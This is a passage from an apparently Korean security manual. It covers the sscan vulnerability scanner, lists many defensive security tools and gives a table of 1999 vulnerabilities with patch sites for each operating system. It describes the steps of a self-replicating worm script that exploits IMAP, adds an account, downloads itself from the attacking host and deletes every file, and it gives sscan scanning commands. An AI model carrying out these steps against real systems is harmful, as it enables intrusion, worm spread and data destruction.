243 -o <host> : 스캐닝할한호스트지정 -e <script> : 디폴트스크립트파일인 Module.ms과함께사용할스크립트파일지정 -m : 모든취약점점검을하지않고스크립트파일만을수행 -s : 표준입력으로부터스캐닝할호스트를지정 -v : 상세한출력나. 일반적인사용예 다수호스트를스캐닝하는경우 $ sscan domainname.co.kr/24 설명 : C 클래스로가정하고해당도메인에 ping을보내찾아진모든호스트를스캐닝한다. DNS 영역을스캐닝하는경우./tools/z0ne -o domain.com./sscan -s > outputfile 설명 : -s 플래그는 IP 주소를표준입력에서받겠다는의미이고, z0ne 등과같은 IP 수집프로그램등과함께사용할수있다. 단일호스트를스캐닝하는경우./sscan -vo 설명 : 특정한하나의호스트의보안취약점을점검하여자세히출력한다. 다. 환경설정 sscan은공격자가선택적으로점검하고싶은취약점항목등을지정할수있도록환경설정파일 ( 디폴트로 Sscan.conf) 를지원한다. 또한점검하고싶은사용자계정의유무등도추가나삭제가가능하다. 디폴트사용자계정은 root, guest이나여기에 bbs, sonnim, anonymous 등을다음과같이추가할수있다. FINGER=yes root, guest, bbs, sonnim, anonymous 공격스크립트 : sscan은보안취약점점검과함께공격목표시스템에대하여예측할수없는공격스크립트에의한공격이가능하게된다. 이스크립트언어는동일한보안취약점이발견되는시스템에서는자기복제를무한히하고시스템의파괴행위등을수행할수있는인터넷웜과같은성격을가질수도있다. 지금까지유닉스시스템에서자기복제가가능한인터넷웜은 '88년 sendmail의 debug 옵션을이용한웜으로인해전세계의시스템들이마비되는사건이후활발하게이루어지지않았었다. 그이유는유닉스시스템은일반 PC의운영체제와는달리워낙환경이많이다르기때문에공통되는취약점을찾기가쉽지않았었기때문이다. 하지만최근에원격지에서의버퍼오버플로우공격에의해시스템관리자도용이리눅스시스템에공통적으로나타나고있어이를이용한인터넷웜제작이가능한상황이다. 이인터넷웜에사용되는 script의기본적인아이디어는성공하지못한명령어가실행되지않는한그결과값을가진다는것이다

즉, 일련의공격과정을스크립트로작성하여이들일련의공격이모두성공할경우시스템침입과파괴행위그리고자기복제에의한전파가가능하고이들중하나의명령어혹은조건이만족되지않을경우스크립트의수행을중지한다. 이러한공격은공통된취약점을가진리눅스시스템등에용이하게이루어질수있다. 한예로아래의간단한스크립트를살펴보기로하자.

244 즉, 일련의공격과정을스크립트로작성하여이들일련의공격이모두성공할경우시스템침입과파괴행위그리고자기복제에의한전파가가능하고이들중하나의명령어혹은조건이만족되지않을경우스크립트의수행을중지한다. 이러한공격은공통된취약점을가진리눅스시스템등에용이하게이루어질수있다. 한예로아래의간단한스크립트를살펴보기로하자. 위의스크립트는다음과정을수행하는명령어들의모음을가진스크립트이다. 1 리눅스인지확인 2 IMAP 취약점확인 3 IMAP을이용한공격시도 (b4b0라는사용자계정추가 ) 4 b4b0라는사용자로 telnet 접속 5 로컬시스템 ( 공격시스템 ) 에 FTP 접속 6 동일한인터넷웜프로그램다운로드 7 동일한인터넷웜프로그램백그라운드수행 8 시스템의모든파일삭제

245 위의과정중하나의과정에서오류가발생하면이스크립트는동작을멈추게된다. 하지만많은리눅스시스템에서이공격이성공하리라생각되어지고그럴경우기하급수적으로이스크립트에의한공격이자동으로이루어질것이다. 대책 : 보안취약점점검도구에의한스캐닝공격에대한뚜렷한대책은없다. 하지만보안취약점진단은시스템공격을위해행해지는최초의행위이고여기서발견된보안취약점을악용하여실제시스템에대한공격이이루어지는경우가대부분이다. 따라서시스템관리자는공격자가취약점을점검하기이전에미리자신의시스템및네트워크의보안취약점을점검하여발견된취약점에대한조치를해야할필요가있다. 더군다나 sscan에서는보안취약점점검뿐아니라, 자기복제가가능한스크립트파일에의해보안취약점에대한적극적인공격행위까지자동으로이루어지므로관리자들의주의를요한다. 보안도구명 : MNS-v75beta 주요기능 : 최근해킹에많이사용되는 rpc 관련취약점을포함하여다음의최근보안취약점을검색해주는도구이다. - POP 취약점 (QPOP/SCOPOP vulnerability checking) - IMAP 취약점 (IMAP vulnerability checking) - NLPS 취약점 (NLPS vulnerability checking) - 웹CGI 취약점 (CGI vulnerability checking) - RPC 취약점 (RPC vulnerability checking) - WuFTPD,ProFTPD 취약점 checking) F3. Scanning 역탐지도구 보안도구명 : Courtney (SATAN detecting too1) 입수처 : 주요기능 : ㆍ네트워크를감시하여 SATAN 공격을시도하는기계를판별함ㆍ tcpdump로부터하나의시스템에서일정시간동안발생된새로운서비스의수를입력한다. 일정시간동안비정상적으로많은서비스접속을요청하면그시스템을스캔공격호스트일것이라고간주한다. 보안도구명 : Gabriel (SATAN detecting tool)

246 지원시스템 : Solaris 1.x, Solaris 2.x.*, 전체 C로작성, 배포됨입수처 : 주요기능 : ㆍ네트워크를감시하여 SATAN 공격을시도하는기계를판별함ㆍ gabriel_client, gabriel_server, 및설치프로그램들로구성됨ㆍ사용자설정보고서, , 호출기를통해관리자에게통보함 보안도구명 : NATAS (SATAN detecting too1) 입수처 : ftp://ftp.cert.dfn.de/pub/tools/audit/natas/ 주요기능 : ㆍ Satan등 TCP probe 프로그램이수행되고있는지검사ㆍ임의로 5개의포트를선택해 30초동안그들중 2개의포트가연결되면해킹을위한시스템스캔으로간주한다. 보안도구명 : RTSD (Real Time Scan Detector, mscan, sscan detecting tool) 입수처 : 사용환경 : solaris 5.x 이상또는 linux 2.0.x 이상개요 : RTSD는국내정보시스템에대한스캔공격현황을파악하고이에적극대응하고자한국정보보호센터에서개발한실시간스캔탐지도구이다. 특징 : 전체시스템은스캔공격을탐지하는 RTSD Agent와이러한탐지시스템으로부터의결과값을분석하고실시간으로공격에대응하는 RTSD Manager로구성된다. RTSD Agent는하나의네트워크또는서브네트워크에하나씩설치되어각각의네트워크를감시하여공격을탐지하고, RTSD Manager는전체네트워크를감시하며, 탐지된공격에자동대응하는기능을갖는다. RTSD는최근해커들이가장많이이용하는 mscan 및 sscan 등에적극대응하고자개발되었으며, 한국정보보호센터 CERTCC-KR에서는이시스템에내장된자동보고기능을이용하여보고된공격시도사이트자료를분석하여어디에서해킹시도를많이하는지현황을파악함으로써해킹사고를미연에방지하는데도움을된다. F4. 네트웍모니터링도구 보안도구명 : Argus 지원시스템 : SunOS 4.x, Solaris 2.3, SGI IRIX 5.2 입수처 :

247 주요기능 : ㆍ범용 IP 네트워크트랜잭션감사용툴ㆍ응용프로그램레벨의디먼ㆍ지정된인터페이스에서데이터그램을전부읽어트래픽상태보고ㆍ libpcap 및 tcp_warppers 패키지를필요로함 보안도구명 : NFSwatch, By Dave Curry and Jeff Mogul 입수처 : 주요기능 : ㆍ전체로컬네트웍상에서의, 혹은특정호스트의 NFS 요구패킷을감시하여서버및클라이언트명, 프로시져명등에따라해석. ㆍ클라이언트의 NFS 요구의트래픽 (traffic) 을감시하며, 서버의응답에의한트래픽을감시할수있다. 또한, 패킷의수와퍼센트를보여주기도하는등시간에따른변화를지속적으로볼수있다. ㆍ각클라이언트가서버로보내는트래픽의양, 클라이언트가서버에대해엑세스하는대상, 및기타모드에대해알아내는데유용함 보안도구명 : Netlog 지원시스템 : SunOS 4.x, SunOS 5.x 입수처 : 개요 : Free Software Foundation에서제작한침입자의침입을발견해내는도구. 주요기능 : ㆍ TCP 및 UDP 트래픽기록시스템으로의심스러운트래픽을검출ㆍ tcplogger, udplogger, extract, 및 netwatch로구성됨 - tcplogger 서브넷에서의모든 TCP통신을기록한다. - udplogger 서브넷에서의모든 UDP session을기록한다. - extract tcplogger나 udplogger에의하여생성된기록파일들을처리 - netwatch 실시간네트워크보기ㆍ SunOS 4.x의 nit 또는 SunOS 5.x의 DLPI를사용 보안도구명 : NETMAN Project 입수처 : ftp://ftp.cs.curtin.edu.au/pub/netman/ 주요기능 : ㆍ Etherman, Interman, Packetman 등의네트워크감시를위한비쥬얼모니터링툴을제작하기위한호주 Curtin대학의프로젝트ㆍ Etherman, interman, 및 packetman, loadman, Geotraceman, Analyser 툴로구성됨 Etherman은이더넷트래픽을가시화하는프로그램이며, Interman 은 IP 트래픽을가시화하는프로그램이다. 또, Packetman은이더넷패킷을분석하는프로그램으로 tcpdump 에사용자인터페이스를추가한것임

248 보안도구명 : ARPwatch 입수처 : 주요기능 : ㆍ Ethernet/IP 주소의진로를추적하기위해서만들어진것으로서, 어떤변화가발생시에는전자메일 ( ) 로결과가보여진다. 보안도구명 : NFR(Network Flight Recoder) 지원시스템 : 대부분의유닉스입수처 : 주요기능 : ㆍ네트워크트래픽분석및모니터링도구ㆍ네트워크자원의실시간감시ㆍ보안위반또는공격패턴감지및경고ㆍ네트워크정보로그ㆍ GUI 제공 보안도구명 : NOCOL (Network Operations Center On-Line), by JVNC- Net 입수처 : ftp://ftp.navya.com/pub/vikas/nocol.tar.gz 주요기능 : ㆍ ICMP 또는 RPC 접속가능성, RMON 변수, 이름서버, 호스트성능, SNMP 트랩, 모뎀회선사용, AppleTalk 및 Novell 라우트및서비스, BGP 피어등의다양한네트워크변수들을감시ㆍ다수의개별적인감시툴의집합으로확장성이좋으며새로운모니터추가가용이함ㆍ확장을위해 perl 인터페이스가제공됨 보안도구명 : authd 입수처 : ftp://ftp.cert.dfn.de/pub/tools/audit/authd/ 주요기능 : ㆍ TCP connection을소유하고있는사용자의이름을보여줌 보안도구명 : tcpdump, by Van Jacobson 입수처 : ftp://ftp.ee.lbl.gov/ 주요기능 : ㆍ Sun의 etherfind와유사하나그보다강력하고사용하기쉬움ㆍ promiscuous 모드로 Ethernet상의모든패킷을포착ㆍ다양한옵션을이용해필요한패킷에대해서만출력가능 보안도구명 : fremont, by University of Colorado 지원시스템 : SunOS

249 입수처 : ftp://ftp.cs.colorado.edu/pub/cs/distribs/fremont/ 주요기능 : ㆍ네트워크의주요특성 ( 호스트, 게이트웨이, 토폴로지등 ) 을찾아내기위한툴프로토타입ㆍ발견된특성을데이터베이스로저장하여이후의비정상상황에대해관리자에게통보ㆍ ARPwatch 및 RIPwatch는 Sun의 Network Interface Tap을사용함 보안도구명 : LSOF, by Vic Abell 입수처 : 주요기능 : ㆍ시스템내의모든열려있는파일 ( 네트워크연결, 파이프, 스트림등을포함 ) 을나열함ㆍ ofiles 및 fstat를기반으로함ㆍ파일을연프로세스, 프로세스가연파일들에대해알수있음ㆍ네트워크연결에대해이를사용하는프로세스의추적등에유용하게사용됨 F5. 시스템내부취약점점검도구 보안도구명 : Titan 입수처 : 주요기능 : ㆍ유닉스시스템의셋업또는구성측면에서의보안점검도구 보안도구명 : COPS(Computer Oracle and Password System) 입수처 : 주요기능 : ㆍ COPS는 UNIX 시스템내부의보안취약점검사프로그램으로서, 보안을조사하여보고해주는실제프로그램들과설치방법, 작동방법, 그리고결과를해석하는방법에대한도큐먼트들로구성되어있다. ㆍ COPS는루트가아닌일반사용자도사용할수있다. ㆍ COPS는단지보안상의취약점에대하여알려주기만할뿐그것을고쳐주지는않는다. ㆍ COPS가검사하는부분 - 파일, 디렉토리, 디바이스등에대한 permission - 예측하기쉬운패스워드 ( 예를들어,login name과패스워드과같은사용자가있는지를알려준다 ) - 패스워드파일이나 group 파일에대한내용과 format

250 - /etc/rc 와 crontab에의하여실행되는 program - root-suid 파일들이존재여부와그파일들에대한 writability - 중요한파일들에대한 CRC - 사용자들의홈디렉토리와 startup 파일 (.profile,.cshrc 등 ) 에대한 writability - anonymous ftp setup - CERT에서발견된버그나보안구멍에관련된파일 - 그밖에 /etc/host.equiv 안에있는 '+' 나제한되지않은 NFS export 보안도구명 : CPM(Check Promiscuous Mode), by Carnegie Mellon Univ. 입수처 : 주요기능 : ㆍ시스템내에 promiscuous 모드로동작중인네트워크인터페이스가있는지검사ㆍ침입자가침투해패킷스푸핑프로그램을동작시켰을가능성이있음을의미함 보안도구명 : ifstatus, by Dave Curry 입수처 : ftp://coast.cs.purdue.edu/pub/tools/unix/ifstatus/ 주요기능 : ㆍ시스템내에 promiscuous 모드로동작중인네트워크인터페이스가있는지검사 보안도구명 : Merlin, by CIAC 입수처 : 주요기능 : ㆍ다른보안툴을패키지화관리 (COPS, TAMU Tiger, Crack, Tripwire, SPI 등지원 ) ㆍ웹브라우져를이용한그래픽인터페이스제공ㆍ사용자프로그래밍에의해다른툴에대한지원추가가능 ( 모든프로그램은 perl로작성됨 ) ㆍ사용된툴타입, 작성일, 대상호스트별로보고서를확인할수있는편리한브라우져제공 보안도구명 : Intelligent Auditing and Categorizing System, by RIACS 입수처 : ftp://coast.cs.purdue.edu/pub/tools/unix/binaudit.tar.gz 주요기능 : ㆍ현재의파일시스템의내용을사전에작성된목록과비교하여변경된내용을보고함

251 보안도구명 : Spar 입수처 : ftp://coast.cs.purdue.edu/pub/tools/unix/tamu/spar-1.2.tar.gz 주요기능 : ㆍ프로세스어카운팅레코드로부터레코드를선택하여표시함ㆍ lastcomm과같은표준의 UNIX 툴에비해빠르고유연함 보안도구명 : SPI, by CSTC 입수처 : 주요기능 : ㆍ대부분의 UNIX 시스템에대한보안점검기능의제공함ㆍ DoD 및 DOE 관련기관용툴 보안도구명 : Swatch, by Stephen Hansen and Todd Atkins 입수처 : ftp://coast.cs.purdue.edu/pub/tools/unix/swatch/ 주요기능 : ㆍ다수의시스템에대한이벤트감시ㆍ일부프로그램을수정하여로깅을강화하고주요시스템로그를감시 보안도구명 : Tiger, by TAMU 지원시스템 : SunOS 4.1.x, 5.1, 5.2, Next 3.0 입수처 : 주요기능 : ㆍ UNIX 시스템의보안상문제점을검사하는스크립트들의집합ㆍ각시스템에대한최신의서명파일제공ㆍ tigerrc 파일을통해점검내용의설정가능 보안도구명 : Tripwire, by Purdue University 입수처 : 주요기능 : ㆍ Tripwire는시스템내부의주요파일들에대한기본체크섬을데이터베이스화하여체크섬을비교하여변화가있는지의여부를판단하여해커에의한시스템변화의발생여부를관리자에게알려주는역할을한다. Unix시스템의파일등이바뀌어진것이있는지등을감시하는여러프로그램들로구성되어지며, 파일 size, link, directory 및새로이생성된또는지워진 file들을감시한다. ㆍ단점 Tripwire 설치전에해킹당한시스템에대해서는무용지물이라고할수도있다. 이미해킹후백도어나트랩도어등이설치되어있는상태에서데이터베이스를생성시킨다면변조된화일의체크섬을기록하게된다. 그러므로이러한단점을극복하기위해서자체적으로실제 OS의배포본의체크섬들을데이터베이스화해서가지고있다면더욱유용한보안도구가될수있을것이다

252 보안도구명 : Watcher, by Kenneth Ingham 입수처 : ftp://coast.cs.purdue.edu/pub/tools/unix/watcher.tar.z 주요기능 : ㆍ사용자정의명령을발행하여출력을분석, 중요한항목들을점검해시스템운영자에게보고ㆍ유연성및확장성제공 보안도구명 : RIACS 입수처 :ftp://ftp.cert.dfn.de/pub/tools/audit/riacs/ 주요기능 : ㆍ파일시스템의목록을검사하여변경된부분을감시 보안도구명 : chklastlog 입수처 : ftp://ftp.cert.dfn.de/pub/tools/audit/chklastlog/ 주요기능 : ㆍlastlog파일의삭제된정보를검사 보안도구명 : chkwtmp 입수처 : ftp://ftp.cert.dfn.de/pub/tools/audit/chkwtmp/ 주요기능 : ㆍ wtmp 파일의삭제된정보를검사 보안도구명 : logsufer 입수처 : ftp://ftp.cert.dfn.de/pub/tools/audit/logsurfer/ 주요기능 : ㆍ임의의로그파일을검사하고분석해줌 보안도구명 : vulture 입수처 : ftp://ftp.cert.dfn.de/pub/tools/audit/vulture/ 주요기능 : ㆍ임의의사용자의 login, logout, 메일의도착등을감시 F6. 패스워드 & 인증관련보안도구 보안도구명 : Crack 입수처 : ftp://ftp.cert.org/pub/tools/crack/ 주요기능 : ㆍ시스템의패스워드파일을사전에등록된단어들과규칙들을이용하여해독

253 ㆍ구성언어를이용하여사용자가추정형태를프로그램가능 보안도구명 : Shadow 입수처 : ftp://ftp.std.com/src/freeunix/shadow.tar.z 주요기능ㆍ패스워드파일을암호화하여일반사용자로부터숨김ㆍ쉐도우패스워드, 쉐도우그룹, DBM 패스워드파일을지원ㆍ패스워드의길이를두배확장ㆍ패스워드 Aging 기능 보안도구명 : cracklib 입수처 : ftp://ftp.cert.org/pub/tools/cracklib/ 주요기능 : ㆍ Crack등으로패스워드해독에사용되는함수들의라이브러리ㆍ passwd류의프로그램에서사용가능 보안도구명 : Npasswd 입수처 : 주요기능 : ㆍ적절하지않은패스워드사용을방지 - null 패스워드를찾아준다. - finger에서나오는정보에패스워드가있는지를찾아준다. - 사용자의개인정보의어떤조합으로패스워드가만들어지는지검사. - 패스워드가사전에나오는지찾아준다. - 짧은패스워드를찾아준다. ㆍ System 3의패스워드 Aging 및 SUN의 NIS를지원함 보안도구명 : passwd+ 입수처 : 주요기능 : ㆍ npasswd와마찬가지로적절하지않은패스워드사용을방지ㆍ구성파일을사용하여패스워드검사를위해사전등의파일의내용을참조하거나, 외부프로그램을호출하는것이가능 보안도구명 : anlpasswd 입수처 : ftp://ftp.cert.dfn.de/pub/tools/password/anlpasswd/ 주요기능 : ㆍ적절하지않은패스워드사용을방지 보안도구명 : Kerberos

254 입수처 : 주요기능 : ㆍ물리적인보안성이없는네트워크용네트워크인증툴ㆍ네트워크상에서상호인증및도청및회신공격을방지ㆍ DES등의암호알고리즘을이용데이터스트림의무결성과비밀성제공 보안도구명 : pidentd 입수처 : ftp://ftp.cert.dfn.de/pub/tools/audit/pidentd/ 주요기능 : ㆍ TCP 연결요청을하는사용자확인위해원격호스트에질의ㆍ RFC1413을구현함 보안도구명 : sra 지원시스템 : Solaris 1.x, Solaris 2.x, Linux, * 전체소스가제공됨입수처 : ftp://ftp.cert.dfn.de/pub/tools/net/sra/ 주요기능 : ㆍ보안 RPC 코드를사용하여네트워크상 (LAN 및인터넷 ) 에서 FTP 및 TELNET에대해암호화된인증기능을제공ㆍ서버와클라이언트는 SRA의사용여부를상호협상하므로표준 FTP 및 TELNET 과함께사용가능ㆍ외부의키서버나티켓서버를필요로하지않음 보안도구명 : S/Key 지원시스템 : PC 및 Mac 입수처 : ftp://ftp.cert.dfn.de/pub/tools/password/skey/ 주요기능 : ㆍ일회용패스워드를구현, *OPIE의사용을권장함 보안도구명 : OPIE(One Time Password in Everything) 지원시스템 : 대부분의 Unix 입수처 : 주요기능 : ㆍ S/Key를기반으로개발됨ㆍ IETF 일회용패스워드 (OTP) 표준 RFC-1938 구현ㆍ S/Key에비해 MD4, MD5 지원및기타보안강화 보안도구명 : ssh(secure Shell) 입수처 : 주요기능ㆍ외부네트워크를통해시스템에원격접속을할때, 강화된인증기능사용ㆍ모든통신이암호화

255

256 보안도구명 : PGP(Pretty Good Privacy) 지원시스템 : UNIX, windows95/nt 입수처 : 주요기능ㆍ통신상에서전자메일을보호하기위한암호화툴로가장많이쓰이고있다. F7. 암호화체크섬 (Checksum) 도구 보안도구명 : MD2, B. Kaliski 입수처 : 주요기능 : ㆍ메시지다이제스트알고리즘 보안도구명 : MD4, by Ron Rivest 입수처 : 주요기능 : ㆍ메시지다이제스트알고리즘, ㆍ각 16단계의 3라운드를사용 보안도구명 : MD5, by Ron Rivest 입수처 : ftp://ftp.cert.dfn.de/pub/tools/crypt/md5/ 주요기능ㆍ메시지다이제스트알고리즘, ㆍ각 16단계의 4라운드사용 보안도구명 : Snefru, by Ralph Merkle 입수처 : ftp://coast.cs.purdue.edu/pub/tools/unix/snefru/ 주요기능 : ㆍ Xerox의보안해쉬함수 F8. 보안강화용대체프로그램 보안도구명 : Logdeamon, by Wietse Venema 입수처 : ftp://coast.cs.purdue.edu/pub/tools/unix/logdaemon/ 주요기능 :

257 ㆍ Logdaemon들은 BSD 4.3 version의 r-command 데몬들을수정하여모아놓은것으로서, rshd, rlogind등의리모트사용자와리모트호스트이름의기록기능을가진수정된버전의데몬들로이루어진다. rsh와 rlogin 데몬들은리모트사용자를기록하기도하고접근제어까지하기도한다. ㆍ rlogind, rshd, login, rexecd, ftpd, telnetd, keysu, skeysh, lib, skey의대체프로그램을제공한다. ㆍ표준의벤더버전에비해더많은로그를기록ㆍ S/Key 일회용패스워드패키지지원 보안도구명 : portmap, by Wietse Venema 입수처 : 주요기능 : ㆍ Portmap 데몬은 NIS, NFS, 그리고 portmapper에등록된다른서비스들에대하여접근을조절할수있는프로그램으로서 NFS, NIS 등에서의보안을높일수있다. ㆍ표준 portmap의대체프로그램으로서 portmap에대해알려진대부분의보안허점을수정함ㆍ NIS 패스워드파일의도용, 인증되지않은 ypset 명령및 NFS 파일핸들의도용방지를포함함 보안도구명 : rpcbind, by Wietse Venema 입수처 : 주요기능 : ㆍ Sun rpcbind의대체프로그램으로서 tcp wrapper 형태의접근제어및풍부한로깅을제공함ㆍ NIS(YP), NFS, 및기타 rpc 서비스에의원격접근을제어ㆍ네트워크주소를기반으로한호스트접근제어가능ㆍ rpcbind 프로세스로부터의요청은일반권한의포트를통해전달ㆍ요청의근원을확인하려하는 rpc daemon으로의요청은거부함 보안도구명 : Securelib, by William LeFebre 입수처 : ftp://coast.cs.purdue.edu/pub/tools/unix/securelib/securelib.tar.z 주요기능 : ㆍ SunOS 4.1.x 시스템의공유라이브러리를대체ㆍ원래의버전과호환되는새로운버전의 accept, recvfrom, recvmsg 네트워킹시스템호출을제공함ㆍ새로운호출은구성파일에따라접속을개시하는기계의주소를점검하여접속이허용될것인지를결정 보안도구명 : ipacl(ip 접근 Control List), by Siemens 지원시스템 : SINIX-L (MX300(Intel) 기반 ), Interactive SVR4 입수처 : ftp://coast.cs.purdue.edu/pub/tools/unix/ipacl/

258 주요기능 : ㆍ모든 TCP 및 UDP 패킷들을강제적으로접근제어목록기능을통과하도록함ㆍ패킷들에대해소스주소, 목적주소, 소스포트번호, 목적포트번호등의특성에따라허용, 거부, 조건적허용, 조건적거부를결정할수있다. ㆍ기존의 TCP/IP 커널소스에대한수정이없이작성되어드라이버설치후커널을다시빌드하기만하면됨 보안도구명 : WU-ftpd, by Washington University 입수처 : ftp://ftp.cert.dfn.de/pub/tools/net/wuarchive-ftpd/ 주요기능 : ㆍ큰 ftp 사이트에서사용하기위한 ftp 디먼ㆍ일반버전에비해보안성을비롯한많은추가기능을제공함ㆍ버전 2.4 이전의제품은심각한보안허점이발견되었으므로 2.4이후최신의버전을사용해야함 보안도구명 : sendmail, by Eric Allman 입수처 : ftp://ftp.cs.berkeley.edu/ucb/sendmail/ 주요기능 : ㆍ표준 sendmail에대해알려진모든보안허점을수정함ㆍ표준 sendmail의버그를수정하고기능을향상시킴 보안도구명 : rdist, by University of Southern Califonia 입수처 : ftp://usc.edu/pub/rdist/ 주요기능 : ㆍ표준 UNIX에배포되는 rdist를대체하는소프트웨어배포유틸리티로다양한기능추가ㆍ현재까지알려진 rdist의보안허점들을보완함ㆍ Setuid " 관리자 " 가필요없음 보안도구명 : sfingerd 입수처 : ftp://hplyot.obspm.fr/net/sfingerd*.tar.gz 주요기능 : ㆍ기본적인유닉스 finger 데몬을대체하는 finger 데몬ㆍ잠재적인보안위험이있는정보제공을차단

259 F9. Windows95/NT 보안도구 보안도구명 : L0phtCrack 지원시스템 : Windows 95/NT, Unix 입수처 : 주요기능 : ㆍ Windows NT 패스워드감사도구ㆍ shareware의경우 SMB session network sniffer 기능제공 보안도구명 : Toilet Paper 지원시스템 : Windows 95/NT 입수처 : 주요기능 : ㆍ백오리피스백도어제거프로그램ㆍ매번부팅시백오리피스를찾아안전하게제거해줌 보안도구명 : nukenabber2.9 지원시스템 : Windows 95/NT 입수처 : 주요기능 : ㆍ일반적인인터넷공격에사용되는 TCP, UDP 포트를 50개까지감시할수있음ㆍ ICMP dest_unreach 공격을기록할수있음 보안도구명 : NTSAfe 지원시스템 : WindowsNT 입수처 : 주요기능 : ㆍ WindowsNT의보안관련설정및감사도구ㆍ서비스팩과 hot fixes를검사하고다운로드ㆍ파일 / 디렉토리접근권한검사ㆍ공유접근권한검사ㆍ사용자패스워드정책및권한검사등 보안도구명 : NTLast 입수처 : 주요기능 : ㆍ Windows NT enent log에대하여유닉스의 last 명령과같은기능을수행 보안도구명 : NTInfoScan v

260 지원시스템 : Windows NT 입수처 : 주요기능 : ㆍ WindowsNT로부터 NetBIOS관련정보를수집하는도구ㆍ패스워드크래킹, 블랭크패스워드, 계정과같은패스워드탐지 보안도구명 : Regmon v4.1 지원시스템 : Windows 95/NT 입수처 : 주요기능 : ㆍ레지스트리관련활동감시도구 보안도구명 : Filemon v4.0 지원시스템 : Windows 95/NT 입수처 : 주요기능 : ㆍ파일시스템활동감시도구 보안도구명 : Portmon v1.03 지원시스템 : Windows 95/NT 입수처 : 주요기능 : ㆍ시리얼, 패러렐포트활동감시도구

261 부록 G. 운영체제별 '99 년도보안취약점및패치 URL 목록 G1. Linux G2. AIX G3. Digital G4. IRIX G5. HPUX G6. Solaris/Sun G7. WindowsNT

262 부록 G. 운영체제별 '99 년도보안취약점및패치 URL 목록 G1. Linux 패치사이트 ftp://ftp.caldera.com/pub/openlinux/updates/ - ftp://ftp.debian.org/debian/dists/proposed-updates/ - 취약점명 취약한버전 amd (am-utils) RedHat 4.2, 5.2, 6.0 ARCAD package The Linux ARCAD package (at least arcad ) autofs Linux Buffer overflow exploit in the alpha Linux (on alpha) linux dev RedHat 6.0 epic4 DOS Debian Linux, epic4 prel pre fsp package Debian Linux ftpwatch Debian 1.3 and later glibc glibc GNOME Linux Mandrake gnumeric RedHat 6.0 htdig Debian GNU/Linux 2.1 telnet, in.telnetd Red Hat Linux 4.2, 5.2, 6.0, a architectures httpd(apache, Debian Boa package) Debian 2.1 cachemgr.cgi RedHat 6.0 pop2d(imapd) imapd4.4 and earlier inetd SuSE Linux initscripts packages RedHat 6.1 insmod Linux ipcalc RedHat 5.1 KDE K-Mail KDE 1.1 and earlier kvt KDE kernel Linux 2.0.x, 2.2.x libtermcap tgetent() Red Hat Linux 4.2, 5.2, 6.0, SlackWare 3.x klogd Linux with klogd linuxconf Linux RedHat 5.2, 6.0 LISA OpenLinux 2.2 (Caldera) login Slackware 7.0 lpr/lpd RedHat 4.x, 5.x, 6.x

263 취약점명 취약한버전 lynx lynx and older man SuSE 6.1. Debian GNU/Linux 2.1, Linux RedHat 5.2.Xauthority(mandrake) Mandrake 6.0 mars_nwe RedHat 4.2, 5.2, 6.0 Midnight Commander Linux with mc 4.xx MILO Linux RedHat 5.x rpc.mountd Linux RedHat 5.x, Slackware 3.3, Caldera nfsd RedHat 4.x, 5.x, Debian 2.1, Slackware7 PAM Red Hat Linux 6.1 for i386 passwd RedHat 6.0 pb and pg SuSE Linux 6.2 pine & ipop3d Pine 4.xx and ipop3d 4.xx ps procps up to cgiwrap Cobalt RaQ 2 and RaQ 3i cgiwrap rpmmail RedHat 6.0, SuSE samba Samba prior to /usr/bin/sccw SuSE 6.2 screen Red Hat Linux 6.1 sendmail RedHat 5.0, 5.1, 5.2 ucd-snmp Linux RedHat 5.2 su RedHat 6.0 super Debian Linux, super version zgv Linux RedHat 5.1 syslogd SuSE 6.2 and 6.3 with syslogd (a1), RedHat 4.x, 5.x, 6.x, Caldera, Cobalt Networks Vixie Cron Vixie Cron version 3.0pl1 VMware VMware for Linux and previous WindowMaker WindowMaker and 0.52 (at least) wuftpd RedHat 6.1 X11R6 NetBSD 1.3.3, Linux(xf ) xtvscreen SuSE 6 G2. AIX 패치사이트 : ftp://aix.software.ibm.com/aix/efixes/security 취약점명 취약한버전 adb(ptrace ()) AIX 4.2.x, 4.3.x enetwork Firewall IBM enetwork Firewall for AIX named-xfer AIX 4.1.5, nslookup AIX 4.1, 4.2 pdnsd C Set ++ for AIX Version 3 ( ), Version 2 ( ) snap AIX up to

264 C3. Digital 패치사이트 : 취약점명 취약한버전 altavista search altavista search intranet 2.x at Digital Unix 4.0 ABCDE CDE DU 4.0CDE buffer overflows Digital Unix 4.x dtlogin Tru64/DIGITAL UNIX V4.0B, V4.0D, V4.0E and V4.0F Firewall97 Digital UNIX 4.0x Insight Manager Web Agent Compag's Tru64/Diqital UNIX V4.0f /usr/bin/mh/inc Digital Unix 4.0ABCDE nsralist Digital UNIX 4.0ABCDE protected password database Digital Unix 4X G4. IRIX 패치사이트 : 취약점명 취약한버전 X server font path buffer overflow IRIX 5.3 IMPACT, IRIX 5.3, 6.2, 6.3, 6.4, 6.5 arrayd , UNICOS 9 and later kernel IRIX 6.2 midikeys IRIX 6.2, 6.3, 6.5, nsd VFS IRIX and prior G5. HPUX 패치사이트 : 취약점명 취약한버전 CDE HP 9000 series 700/800 at HpUX revision 10.X MPEi/X debug All HP3000 (MPE/iX 5.0 and MPE/iX 5.5) DESMS HP 9000 Series 7/800 (HP-UX and 11.00) ftp HP 9000 Series 7/800 (HP-UX release 11.00) hpterm HP 9000 Series 7/800, (HP-UX release 10.20) MC/ServiceGuard & MC/LockManager HP 9000 Series 7/800 (HP-UX10.X and 11.00) rpc.cmsd HP-9000 Series 7/800 (HP-UX 10.20, 10.30, 11.00)

265 취약점명 sendmail S/X/V Class console VirtualVault(TGAD) 취약한버전 HP 9000 Series 7/800 (HP-UX and 11.00) (sendmail 8.8.6) HP9000 Series 800 S/X/V Class servers. HP9000 Series 700/800 running: G6. Solaris/Sun 패치사이트 : ftp://sunsolve1.sun.com/pub/patches/ 취약점명 취약한버전 arp Solaris 2.x automountd Solaris 2.5, 2.5.1, 2.6, 2.7Beta (X86 and SPARC) cancel SunOS 5.6 dtappgather SunOS 5.5 & running CDE. version 1.0.2, DU 4.0X, Unixware7 chkperm Solaris 2.x dmesg Solaris prior to Solaris7 dmispd Solaris7 mailtool Solaris7 dtprintinfo Solaris 2.6, 2.7 (x86 & sparc) ff.core Solaris 2.5, 2.5.1, 2.6, (2.)7 ICMP Router Discovery Protocol SunOS/Solaris kcms_configure Solaris7 libc Solaris 2.6, Solaris7 LD_PROFILE Solaris 2.5, 2.6 lpstat Solaris 2.7 x86 rdist and lpstat SunOS/Solaris mail Solaris 2.7 sadmind Solaris 2.x sdtcm_convert Solaris 2.4, 2.5, 2.5.1, 2.6 and 7 snoop Solaris 2.4, 2.5, 2.5.1, 2.6, and 